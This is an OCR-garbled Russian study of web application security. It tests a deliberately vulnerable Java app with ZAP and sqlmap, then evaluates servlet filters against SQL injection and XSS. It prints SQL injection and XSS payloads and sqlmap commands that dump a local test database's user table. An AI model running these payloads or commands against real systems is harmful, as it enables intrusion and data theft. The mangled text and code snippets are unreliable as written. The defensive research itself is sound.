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Google Guice - Java-(})peHMBopK, ooecncHMBaiouiMH 

lIOZI/ICp/KKy BlICapCIIHa 3aBHCHMOCTeH HCpC3 aHHOTaU,HH 
fljia KOH(J)HrypHpoBaHHa oSbcktob. Ero Hcnojib30BaHHe 
no3BOJ[aci OTflejiaTb KOHTpaKT oSbCKia ot ynpaBJiciiHH ero 
3aBHCHMOCTBMH, a TaK>Ke npHB33bIBaTb K HHTep^eiicaM 
KOHKpeTHbie peajiH3an,HH. 

Kon(|)MrypaUMH CepBJieTOB H CepBJieTHbIX (J)HJIbTpOB 
npoHcxoflHT cjicayiOLUHM o6pa30M - b nacjicaiinKc KJiacca 
ServletModule ncpeonpeaejiaeica MCioa configureServlets. 
MeTOflbi filter("urlPattem").through(yFilter.class) h 
serve(“urlPattem”).with(yServlet.Class) HacTpaHBaiOT 
cepBJieTHbie (|)MJibipbi h cepBJieTbi cooTBeTCTBemio. 
OSbIHHO >Ke 3TO ZlCJiaC'ICH B /UCCKpHinOpe pa3BCpib[Bai[HH 
web.xml, HanpnMep, iioaKJnoHCiiHe (JmjibTpa: 

<filter> 

<filter-name> MyFilter</filter-name> 
<filter-class>MyFilterClass</filter-class> 

</filter> 

<filter-mapping> 

<filter-name>MyFilter</filter-name> 

<url-pattern>/*</url-pattem> 

</filter-mapping> 
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Phcvhok 2.2.1.1 ApxHTeKTypa HCD-npH.io'/KCiiHa 
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2.2.2. Oimcamie TecToeoro npHJioaceHHH 

TecTOBoe BeS-npHJioaceHHe npe#CTaBJuieT co6oh 
MaKCHMajibHO npocTyio pcajibnaumo coipiajibHOH ccth co 

CJIC^yiOLUHMH B03M05KH0CT3MH: 

• perHCTpau,HB yHCi iiOM ibiihch; 

• Bxofl b aKKayHT h Bbixofl H3 Hero; 

• H3MeHeHHe ziamibix aKKaym a; 

• noHCK flpyrnx nojib30BaTejieH cera; 

• OTnpaBKa 3asBOK Ha flo6aBJieHHe b cnncoK flpy3en; 

• B03M0>KH0CTb HpHHSTb/OTKJIOHHTb 3BHBKy; 

• C 03 ^aiiHC naTOB c i ioji B 30 Barcjia mh . 

IlpHJio>KeHHe HaMepeHHO pa3pa6oTaHO c iickotopbimh 

ya3BHMOCTBMH, HanpHMep, Hcnojib3yiOTca hh 11a mhh cc kh c 
3anpocbi 6e3 CB^namibix nepeMeHHbix, OTcyTCTByeT 
3KpaHHpoBaHHe h (J)HJibTpau,Ha bxo^huihx jjamibix, a TaK>Ke 
HiHtfipoBaHHe napojicR, Hcnojib30BaHbi ncKoppcKiiibic 
ajiropHTMbi Bxofla h Bbixona H3 aKKayHTa. 


67 




2.2.3. TecTHpoeaHHe BeS-npmioaceHHH 

icciHpoBaiiHH BcS-npHJiO/Kcnux 6biJi BbiSpan 
CKaHep yHSBHMOCiCH Zed Attack Proxy h CKancp 
oSnapy/KCiiHa hiibckumh sqlmap. 


IlaccHBHoe CKauMpoBauMe ZAP onpeflejiHJio 

CJie/tyiomHe y»3BHMOCTH (pHC.2.2.4.1): 



OnoBemeHMfl (13) 


► P> Application Error Disclosure 

► Pi HTTP Only Site 

► P> X-Frame-Options Header Not Set 

► Pi Content Security Policy (CSP) Header Not Set (5) 

► pi Password Autocomplete in Browser (2) 

► pi Server Leaks Version Information via "Server HTTP Response 

► p) Web Browser XSS Protection Not Enabled (5) 

► Pi X-Content-Type-Options Header Missing 

► Pi OTcyTCTByiOT TOKeHbi npoTMB CSRF aTaK(3) 

► P< Non-Storable Content (6) 

► Pi Storable and Cacheable Content (4) 

► Pi User Agent Fuzzer (7) 

► P< CKaHep ya3BMM0CTeH Cookie 

PucyiroK 2.2.3-1 Pe:tyjn>TaTi>i naccHBHoro CKaiiHporiaima 

CpenHHH ypoBeHb pucica: 

Application Error Disclosure - CTpamiua co^epacHT 
cooSmeHne 06 omnSice; oto MoaceT BbmaTb 
KOiK])M!fcimHajibiiyio HiK|)opMauMio Bpoac MecTa 
HaxoacfleHna (Jtanjia, Bbi 3 BaBinero Heo6pa6aTbiBaeMoe 
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HCKJnoneHHe (Ha CTpaHHu,e npHcyrcTByeT cooolhciihc 06 
olumSkc npn HenpaBHJibHO BBcncmibix jiorHHe/napojie). 

HTTP Only Site - He Hcnojib3yeTca HTTPS-npoTOKOJi. 

X-Frame-Options Header Not Set - 3arojiOBOK X-Frame- 
Options fljia BauiHibi ot ClickJacking-aTaK He bkjiiohcii b 
HTTP-OTB eT. 

Hh3khh ypoeeHt pnciva: 

Content Security Policy (CSP) Header Not Set - 
3arojiOBOK CSP pjm oiipcncjicnmi .qonycTHMbix Ha 
CTpaHHH,e pecypcoB He bkjiiohcii b otbct. 

Password Autocomplete in Browse - aBT03anojiHeHHe 
napojieii b 6pay3epe. 

Server Leaks Version Information via "Server" HTTP 
Response Header Field - b OTBeTe concp/Kmca 
HH(J)opMaii,Ha o BepcHH cepBepa. 

Web Browser XSS Protection Not Enabled - BCTpoemras 
3amnra ot XSS aTaic He BKjnoneHa. 

X-Content-Type-Options Header Missing - 3arojiOBOK 
fljia aaniH i bi ot nepexBaTa He bkjhohch b o i bci . 

OTcyrcTByioT TOKeHbi npoTHB CSRF aTax. 

AKTHBHoe CKaHHpoBaHHe ZAP onpeflejiHJio 

CJieflyroniHe ya3BHMOCTH (phc.2.2.4.2): 
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| gf Mcropwa | ^ floHCK | ft OnoBemeHHH * | BbiBOfl | ^ flayk | & AkTHBHoe CxaHupciE 

T 6 OnoBemeHHa (18) 

► Pi Advanced SQL Injection - PostgreSQL > 8.1 AND time-based blind 

► P Advanced SQL Injection - PostgreSQL >8.1 stacked queries (comment) 

► P Advanced SQL Injection-PostgreSQL AND error-based - WHERE or HAVING clause 

► P Cross Site Scripting (0Tpa>KeHHbiH)(2) 

► P SQL-MH'beKUMH - PostgreSQL 

► Pi Application Error Disclosure 

► Pi HTTP Only Site (2) 

► Pi X-Frame-Options Header Not Set 

► pi Content Security Policy (CSP) Header Not Set (5) 

► P Password Autocomplete in Browser (2) 

► P Server Leaks Version Information via "Server' HTTP Response Header Field (10) 

► P Web Browser XSS Protection Not Enabled (5) 

► P X-Content-Type-Options Header Missing 

► P OTcyTcrByioT TOkeHbi npoTHB CSRF aTak(3) 

► P Non-Storable Content (6) 

► P Storable and Cacheable Content (4) 

► P User Agent Fuzzer (252) 

► P CkaHep ya3BUM0creii Cookie (2) 


PncyHOK 2.2.3-2 Petya i>TaTi>i aKTHBHoro CKaiiHporsaiiHK 

Bmcokmm ypoeeHb piicKa: 

SQL-hi ibCKUHFt - PostgreSql - onpeacjicna 
HCii0J[b3ycMa>t CYBfl (Hii bCKUHa CHMBOJia ’ b none jiorHHa). 

Advanced SQL Injection - bo3mo5khoctb 
ocynicc i BJicnmi SQL-aTaK pa3Hbix thiiob: 

1) time-based blind (mrbCKnuH BbipaaceHna ZAP 1 AND 
3305=(SELECT 3305 FROM PG_SLEEP(5)) AND 
'sKpe'-sKpe b none jiornHa); 

2) stacked queries (mibCKuna Bbipaacemia 
ZAP';SELECT PG_SLEEP(5)- b none JiorHHa); 
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3) error-based (mn.eKii.Hfl Bbipa/Kcnna ZAP' AND 
6519=CAST((CHR(58)IICHR(102)IICHR(113)IICHR(109 
)IICHR(58))II(SELECT (CASE WHEN (6519=6519) 
THEN 1 ELSE 0 

END))::textll(CHR(58)IICHR(103)IICHR(97)IICHR(101)ll 
CHR(58)) AS NUMERIC) AND 'kltr'='kltr b nojie 
jiorHHa). 

Cross Site Scripting - bo3mo5khoctb ocynicciBJicnna 
XSS-aTaK (niibCKUHa BbipaHcemia 

"><script>alert(l);</script> b none BBona). 

npnMep ocymecTBJieHHoii Bpymiyio XSS-aTaKH: 

C © localhost8080/test/profileChange ☆ @ Q 

itNet Ivan Ivanov flp/3bn CooOmeHMn noncK FeflaKTupoBaTb npocpwib Bwmth M 

H3MeHeHne npocfckinn 


OaMMnMn 

Ivanov 

O ce6e 

•'><script>alert(”XSS-ATTACKI!ir)</scnpt> 

COXpaHMTb M3MeHeHHfl 

PncyHOK 2 . 23-3 IlpHMep XSS-aTaKH - bbo/i CKpariTa 


X © localhost8080/test/profile h © Q 


itNet Ivan Ivanov flpy3bn ( 

noATBepAMTe ACHCTBHe Ha localhost:8080: 

pO$MJlb BblMTM M Iti 


XSS-ATTACK!!!! 


npOC(3MHb 

[ “ 1 



Ivan Ivanov 

O ce6e: "> 


PncyHOK 2.2.3-4 PIpHMep XSS-aTaKH - pe3yjibTaT 
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npoTecmpyeM npiuioateHiie c noMOuibio sqlmap. 
3anycTHM KOManay: 

python sqlmap.py -u http://localhost: 8080 /test/login 
data="login=sqlmap&password=sqlmap" -dbs 
-u - iteaeBOH URL 
—data - napaMeTpw POST-3anpoca 
—dbs - BMBOfl flocTynHbix CYE/i, 



Ha cipaiiHuc /login napaMeTp POST-3anpoca login 
aBJiaeTca y»3BHMbiM k SQL-aTaicaM (boolean-based blind, 
error-based, stacked queries, time-based blind). Onpcacjicna 
ncnojib3yeMaa TexHOJioraa BCO-npnjio’/Kenna - JSP. Taicace 
onpcacjicna nejiCBaa CYB/i - PostgreSQL. 

Hanacmibie Bfl: 


available databases [4]: 
[*] infornation_scbena 
[*] itnet 
[*] pg_catalog 
[*] testdb 


PncynoK 2 . 23.6 Haii/icirnue B/i 
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Bbczicm CJic/iyiouiyio Koxtaiiay ^jia iiojiywcnnH cmicKa 
TaSjiHu, 6a3bi aamibix testdb: 

python sqlmap.py -u http://localhost: 8080 /test/login 
data="login=sqlmap&password=sqlmap" -D testdb -tables 
riojiynaeM cnncoK: 



Phcvhok 2 . 23.1 Ctihcok TaOJimi B/I testdb 

Bbchcm KOManay aji» iiojiyncnHa aaxina Ta6jiHH,bi user: 
python sqlmap.py -u http://localhost: 8080 /test/login 
data="login=sqlmap&password=sqlmap" -D testdb-T user-dump 
Pe3yjibTaT: 


Database: testdb 
Table: user 
[5 entries ] 


id : 

info 

! password S 

last_name 

! first_name 

sql : 

<blank> 

! inject ! 

HACKER 

i TRUE 

troll ! 

a 

! fat ! 

a 

I talk 

userl ! 

<blank> 

1 1234 : 

Ivanou 

! I van 

user2 ! 

info 

! 12345 : 

Petrov 

! Petr 

user3 ! 

<blank> 

! 123456 I 

Semenov 

! Senen 


PncynoK 2.2.3.8 Bbibo/i TaOJiHiibi user 


TaKHM o6pa30M, 3KcnjiyaTupya ohhii jiunib napaMeTp 
login Ha CTpaHHu,e aBTopH3au,HH, y^ajiocb nojiyumb 
/tamibic Bcex 3aperacTpHpoBaHHbix nojib30BaTejieH 6a3bi 
/tamibix testdb. 
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2.2.4. TecTHpoeaHHe BeS-npmioaceHiiH c 

HCn0Jlb30BaHHeM pa3pa60TaHHbIX <])HJIbTpOB 
IIo/IKJIIOHeHHe (])HJIbTpOB 

IlpHMep nonKjnowcnna (})HJibTpa npoBepKH 3arojiOBKa 
referer b vioayjic Kon(|)nrypnpo Banna cepBJieTOB: 

Map<String, String> referrerFilterParams = new HashMap<>(); 
referrerFilterParams.putf 1 valid Patterns", 
"http://localhost:8080/testsec/"); 

filter("/*").through(ReferrerFilter.class, referrerFilterParams); 

IlaccHBHoe CKamipoBaHiie ZAP onpenejiHJio 
cjicayiontnc ya3BHMOCTn: 



T Lz OnoBeigeHna (7) 

► P HTTP Only Site 

► Pi Password Autocomplete in Browser 

► P Server Leaks Version Information via "Server" HTTP Response I 

► P OTcyrcTByioT TOKeHbi nponiB CSRF aiaK(2) 

► P Non-Storable Content (8) 

► P Storable and Cacheable Content (3) 

► P User Agent Fuzzer (7) 

PncyHOK 2.2.4-1 PciyuimaTi.r naccHBHoro CKamipoBaHHJi 

CpenHHH ypoBeHb piicKa: 

HTTP Only Site 
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Hhskhh ypoeeHb piicKa: 

Password Autocomplete in Browse 
Server Leaks Version Information via "Server" HTTP 
Response Header 

OTcyrcTByioT TOKeHbi npoTHB CSRF aTaK. 


AKTHBHoe CKaHiipoBaHiie ZAP onpeflejiHJio 


CJienyioiiiMC ya3BHMOCTH: 


“ MCTopun rioiiCK ft OnoBeuieHiia * Bwboa 1 AKTHBHoe Ckshmpob 


® « s 

* C* OnoBemeHHa (7) 

► Pi HTTP Only Site 

► pi Password Autocomplete in Browser 

► P Server Leaks Version Information via ‘Server HTTP Response Header Field (17) 

► P OTcyrcTByioT TOKeHbi npoTHB CSRF aTaK (9) 

► P Non-Storable Content (10) 

► P Storable and Cacheable Content (9) 

► p User Agent Fuzzer(196) 


PncyHOK 2.2.4-2 Peayni/raTW aKTHBHoro CKaiiHpoBaiiHrt 

AKTHBHoe CKaHHpOBaHHe He OlipCHCJIHJIO HOBbie 
y»3BHMOCTH, OTJIHHHbie OT liaHHCHliblX B naCCHBHOM 
pC/KHMC. BblJIO iipOBCHClIO nOBTOpHOe aKTHBHOe 
CKaHHpOBaHHe c yBejiHneHHbiM ypoBHeM aTaKH, KOTopoe 
TOHce He BbMBHJio y»3BHMOCTeH. Phckh aTaK SQL H XSS 
ycTpaHeHbi. Phckh, CBxtamibic c He BKJiiOHeinibiMH b 
HTTP-OTB eTbi 3arojiOBKaMH odcciiCHeiiHa 6e3onacHOCTH, 


TaKHce ycTpaHeHbi. 
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OSbimioc TecTHpoBaHHe sqlmap noKa3ajio oacuzjaeMbie 
pe3yjibTaTbi: onpencjiciiMC u,ejieBOH CYB/], HeB03M0>KH0, 
napaMeTpbi He hbjihioich y»3BHMbiMH fljia SQL-aTaic. 
YpoBeHb icci HpoBanHH 6bm noBbimeH ho MaKCHMajibHoro 
(KpoMe napaMeTpoB 3anpoca npoBepaiOTca TaK>Ke 
3arojiOBKH), a u,ejieBaa CyE,H, 6bma npomicaHa, KaK 
napaMeTp: 

python sqlmap.py -u http://localhost:8080/testsec/login 
data="login=sqlmap&password=sqlmap" --level=5 -dbms=PostgreSQL 
Bee BHflbi HHbeKH,HH obuiH onpoSoBaiibi Ha napaMeTpe 
login, Ha 3arojiOBKax Referer, Host, User-Agent, ho 
ys3BHMOCTH He 6buiH o6Hapy>KeHbi. Tan ace 6biJi yBCJiitHcn 
ypoBeHb pncKa TecTHpoBaHna — risk=3, ho oto He noMorao 
o6Hapy>KHTb ya3BHMbie napaMeTpbi. 
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2.2.5. EkicTpoaeftcTBiie 

ripH njiaHHpoBaHHH oSecneneHHa 6e3onacHOCTH Be6- 
npHJIO>KeHHa IICOOXOHHMO nOMHHTb 0 SblCTpOHCMCTBHH. 

HaflO noHHMaTB, hto b ycHJicmiofi 3amHTe ny/K^aioica 
3anpocti, CBH3amibic c H3MeHeHHeM iiamibix yiCTiiOH 
3anHCH, lipOBCHClIHCM ipaiI3aKUHH. IIpH 3TOM He CTOHT 
CTaBHTt TaKyio lammy Ha aScojiioxiio Bee CTpaHHu,bi h 
^ eHCTBHa b Be6-npHJio>KeHHH, HanpHMep, Ha CMeHy mwKa 
hjih ncpexon Ha MOOHJibiiyio Bepcnio. 06pa6oTKa 3anpocoB 
h OTBeTOB, icnepaunH h npoBepna tokchob, 
HiH(|)poBanHc/HeHiH(|)poBanHC - Bee sto 3aHHMaeT KaKoe-TO 
BpeMB. Bee Mbi cnocoSiibi nonO/Knaib, nona oopaSoiaioica 
namibic iip m coBepmeHHH KaKoio-JinSo njiaTe>ica hjih 
H 3MeHeHHa yicxiibix namibix, ho ecjin TaKoe oyncr 
npoHexoflHTb co BceMH 3anpocaMH, nojib30BaTbca t3khm 
B e6-npHJio>KeHHeM 6yncr KpaiiHe neKOM(|)op'mo, h 
nojib30BaTejiH naBepnxKa ncpcH/iyi Ha aHajior c MeHbiHHM 

OTKJIHKOM. 

CpaBHHM ObIC'ipOHCHC'IBHC TeCTOBOrO npHJIOaceHHB. 
06mee BpeMa b Ta6jiHH,ax noKa3biBaeT Bpevia, iiaimiaH ot 
OTnpaBKH 3anpoca ho nojiyneHHa OTBeTa. 
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Ta6jiHu,a 1 EbicxpcuiCHCTBHC 6e3 Hcnojib30BaHHH (JmjibTpoB 


URL 

06pa6oTKa 3anpoca, mc 

06mee Bpe/via, mc 

/login 

13 

307 

/login 

9 

210 

/login 

9 

300 

/login 

9 

218 

/login 

9 

199 

CpeflHee 

9,8 

246,8 


Ta6jIHU,a 2 EblCTpCXUCHCTBHC C HCII0JIb30BaHHeM (J)HJIbTpOB 


URL 

Pa6crra 

(J)M/lbTpOB, MC 

06pa6oTKa 

3anpoca, mc 

06m,ee 

BpeMB, MC 

/login 

11 

19 

231 

/login 

5 

18 

314 

/login 

9 

18 

226 

/login 

5 

14 

218 

/login 

7 

15 

301 

CpeflHee 

7,4 

16,8 

258 
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AHajiH3 pe3yjibTaT0B 


CKaHHpoBaHHa TecTOBoro npHJio>KcnHa c 
IIOflKJIIOHeHHblMH (})HJIbTpaMH, lipOBCHCmiblC C HOMOLUblO 
ZAP, He BblBBHJIH Cepbe3HbIX y«3BHMOC'ICH Bpo^e 
B03M0>KH0CTH OCyLHCCTBJICIIMH SQL HJIH XSS aTaK, KaK B 
CJiynae c npHJio>KeHHeM 6e3 Hcnojib30BaHHa (|)HJibTpoB. 
YTHJiHTa sqlmap TaK>Ke He o6Hapy>KHJia ya3BHMbix k SQL- 
HHbeKH,HBM iiapaMCipoB hjih 3arojiOBKOB HTTP-3anpoca. 
3t0 rOBOpHT O TOM, HTO pa3pa60TaHHbie (})HJIbTpbI MO>KHO 
Hcnojib30BaTb hjih 3amHTbi Be6-npHJio>KeHHH, HanHcaHHbix 
Ha Java. Ilpn 3tom He ctoht 3a6biBaTb, hto pa3pa6oTaHHbie 
cpcHCiBa ooecncMHBaioi jihuib 6a30Byio 3amHTy. Ilpn 
pa6oTe c koik|)hhci i unaji bi i bi mh jjamibiMH h (|)MnancaMii 
CJiCHyex no3a6oTHTbc» TaK>Ke o MexaHH3Max 
ayreHTH(|)HKaLi,HH/aBTopH3aii,HH, KOHTpojie nocTyna, 
HiH(f)poBaHHH, TOKeHax ayicmH(|)MKauHH n jib 
iipcnoTBpamenmi CSRF-aTaK. 

P accMOTpHM ObicipoHciieiBHC BeS-npHJioaceHHH. Ilo 
pe3yjibTaTaM TecTHpoBaHHH b cpcjniCM pa6oTa (JjHjibipoB 
3aHHMaeT 45% BpeMeHH o6pa6oTKH 3anpoca h 2,9% 
o6mero BpeMeHH. Ilo cpaBHeHHio c npHJioHieHHeM 6e3 
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Hcnoj[b30BaiiHH (})HJibTpoB, o6pa6oTKa 3anpoca 
yBenHHHJiacb Ha 71,4%, a o6mee BpeM» - Ha 4,5%. 
HecMOTpa Ha to, m io o6pa6oTKa 3anpoca CTajia 3aHHMaTb 
3HaHHTejibHO Sojibme BpeMeHH, b u,ejioM fljia HejioBeKa 
pa3HHH,a MC>KHy oolhhm BpeMeHeM OTKJiHKa c npHMeHeHHeM 
(J)HJIbTpOB H 6e3 HHX He 3aMeTHa. 

OSipne peKOMeH/japHn no oSecneHeHmo 
6e3onacHOCTH Be6-npnji05KeHnn 

1) B3aHMOfleHCTBHB C B/l HCnOJIb3yHTe 
noflroTOBJieHHbie 3anpocbi bc3hc, itic HCiioJibByioica 
nepeMeHHbie, ccjih sto bo3mo>kho. 

2) He Hcnojib3yHTe no#o6Hbie KOHCTpyKu,HH: 
final Statement select = connection.createStatementQ; 
final String query = 

"SELECT* " + 

"FROM testdb.user " + 

"WHERE id = + id + 

3flecb id HBJiHeica BxoflHbiM napaMeTpoM, Koiopbiii 
npocTO o i iipaBJiaci CH b SQL-3anpoc. 

Bmccto 3toto Hcnojib3yHTe cjieflyiOHtHH tco#: 

final PreparedStatement select = connection.prepareStatement( 
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"SELECT *" + 

"FROM testdb.user" + 

"WHERE id = ?" 

); 

select.setString(l, id); 

3) nipOBCpXHTC THnbI BXOJtHIHMX OT KJIHeHTa .aamibix H 
cooTBeTCTBHe BBoaa pci yjiMpiibiM Bbipa/KcnnaM. 

4) cpHJibTpyHTe h/hjih 3KpaHHpyirre Bee Bxojnibic jiamibic 
co CTopoHbi KJIHeHTa, 6yjtb to napaMeTp 3anpoca H3 nojia 
BBoaa hjih BnanciiHC 3arojiOBKa. 3to noMO>KeT laHimmbca 
ot TaKHx aTaK, KaK SQL h XSS. 

5) Ups. 6e3onacHoro BbiBona nepeMeHHbix Ha capaHHite 

npn Hcnojib30BaHHH JSP - 3aKJHOHaHTe hx b <c:out 
value="${user.name}"/> jtjih BbiBona hh(J) opMau,HH hjih b 
<input type="text" name="foo" 

value="${fn:escapeXml(param.foo)}" /> fljia nojieii BBOfla. 

6) Hcnojib3yHTe cneu,HajibHbie HTTP-3arojiOBKH jtjih 
BKJHoneHHa ^onojinmcjibiioit 6pay3epHoii 3amHTbi. 3to 
3HaHHTejibHO ycjio>KHHT 3KcnjiyaTau,Hio y>Ke hmciolhhxch 
y«3BHMOCICH. 

7) Hcnojib3yHTe roTOBbie MexaHH3Mbi ayTeHTH(J)HKaH,HH c 
peajiH3au,HeH tokciiob jtjih oScciichciimh 3amHTbi ot CSRF- 
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aTaK. TaK>KC mo>kho ncnojib30BaTb npoBepKy 3arojiOBKa 
referer KaK .aonojiiimcjibiioe cpcnciBO Kom pojia. 

8) Hcnojib3yHTe Mexami3Mbi Kompona flocTyna k 
3anpaniHBaeMbiM pecypcaM. 

9) Ilo3a6oTbTecb 06 oSecneneHnn npaBHJibHoro Bbixo^a 
H3 yHCiiiOH 3anncn - 6jioKHpyHTe ceccHio, 3anpeTHTe 
6pay3epy KcuinpoBai b cipaiiHUbi. 

10) Hcnojib3yHTe ctohkhc ajiropnTMbi imn|)poBaHHa 
namibix, ocoocmio ^Jia naponen. 

11) He HCnOJIb3yHTe HHCTpyMeHTbl C H3BeCTHbIMH 
ya3BHMOCTBMH. 

12) H3mciibhic yHCiiibic 3anncn no yMOJinaiiHio b 
ncnojib3yeMbix KOMnoHeHTax, HanpnMep, b CYB/1. 

13) He xpaHHTe kphthhcckmc namibic 6e3 ncooxonMMOCTi-i, 
yflajianre Hencnojib3yeMbin Kon. 

14) nojib3ynTecb «6ejibiMH» cnncKaMn flonycTHMbix 
anpccoB npn onpcncjiciiHH nepeHanpaBJieHnn. 

15) PeryjiapHO oSnoBJiamc ncnojib3yeMbie KOMnoHeHTbi n 
nO, npoBOflHTe TecTnpoBaHHa 6e3onacHOCTH n o63op ico^a. 
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3aKJH0HeHHe 


B xofle pa6oTbi 6 mjih paccMOTpeHbi caMbie nonyuapHbie 
ya3BHMOCTH H3 OWASP Top-10, cnocoobi hx BbixBJicnux h 
yc ipanciiHa, a iaK/KC HHCTpyMeHTbi, npc^naanaMcmibic ^Jia 
3Toro. Pa3pa6oTaHbi cepBJieTHbie (|) mji bipbi ^ jib 
oOecneneHiBi 6e3onacHOcm Bed-npHJioaceHHa Ha Java. 

BbinojiHeHO TecmpoBaHHe c iiomolhbio HHCTpyMeHTOB 
Zed Attack Proxy h sqlmap. CKaHHpoBaHHe ya3BHMoro 
TecTOBoro npHJioaceHHa bbihbhjio aicnyiomnc cepbe3Hbie 
ya3BHMOCTH: B03M0>KH0CTb OCyiHCCTBJICIIHH SQL H XSS 
aTaK, a TaK>Ke OTcyrcTBHe cnen,HajibHbix 3arojiOBKOB ^ jib 
BKJiiOHeHHa 3auiHib[ 6pay3epa. CKaHHpoBaHHe TecTOBoro 
npHJioJKeHHs, HcnojibayiOLHcro pa3pa6oTaHHbie c|)mji bipbi. 
He BblBBHJIO HamibIX y«3BHMOCTCH. 

Taioice 6bm c(|)op\iHpoBan ciihcok oolhmx 
peKOMeHflau,HH no oSecneneHHio 6e3onacHOCTH Be6- 
npHJIO>KeHHH. 
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